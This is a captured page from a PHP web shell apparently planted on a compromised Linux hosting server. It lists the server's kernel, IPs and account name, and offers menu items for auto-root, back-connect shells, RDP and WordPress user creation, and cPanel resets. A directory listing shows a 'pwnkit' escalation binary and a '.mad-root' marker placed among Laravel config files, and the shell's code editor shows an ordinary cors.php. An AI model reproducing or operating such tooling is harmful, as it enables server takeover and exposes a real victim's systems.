Linux server-604606.appsiete.com 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.240.172.200 | : 216.73.216.32
14 Domain
7.3.33
gujo45me
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
gujo45me /
public_html /
demo2 /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
app.php
8.38
KB
-rw-r--r--
auth.php
3.51
KB
-rw-r--r--
broadcasting.php
1.57
KB
-rw-r--r--
cache.php
2.62
KB
-rw-r--r--
cors.php
1.57
KB
-rw-r--r--
database.php
3.86
KB
-rw-r--r--
filesystems.php
2.08
KB
-rw-r--r--
hashing.php
1.52
KB
-rw-r--r--
logging.php
2.17
KB
-rw-r--r--
mail.php
4.12
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
queue.php
2.55
KB
-rw-r--r--
services.php
999
B
-rw-r--r--
session.php
6.71
KB
-rw-r--r--
view.php
1004
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cors.php
<?php return [ /* |-------------------------------------------------------------------------- | Laravel CORS Options |-------------------------------------------------------------------------- | | The allowed_methods and allowed_headers options are case-insensitive. | | You don't need to provide both allowed_origins and allowed_origins_patterns. | If one of the strings passed matches, it is considered a valid origin. | | If array('*') is provided to allowed_methods, allowed_origins or allowed_headers | all methods / origins / headers are allowed. | */ /* * You can enable CORS for 1 or multiple paths. * Example: ['api/*'] */ 'paths' => ['api/*'], /* * Matches the request method. `[*]` allows all methods. */ 'allowed_methods' => ['*'], /* * Matches the request origin. `[*]` allows all origins. Wildcards can be used, eg `*.mydomain.com` */ 'allowed_origins' => ['*'], /* * Patterns that can be used with `preg_match` to match the origin. */ 'allowed_origins_patterns' => [], /* * Sets the Access-Control-Allow-Headers response header. `[*]` allows all headers. */ 'allowed_headers' => ['*'], /* * Sets the Access-Control-Expose-Headers response header with these headers. */ 'exposed_headers' => false, /* * Sets the Access-Control-Max-Age response header when > 0. */ 'max_age' => false, /* * Sets the Access-Control-Allow-Credentials header. */ 'supports_credentials' => true, ];
Close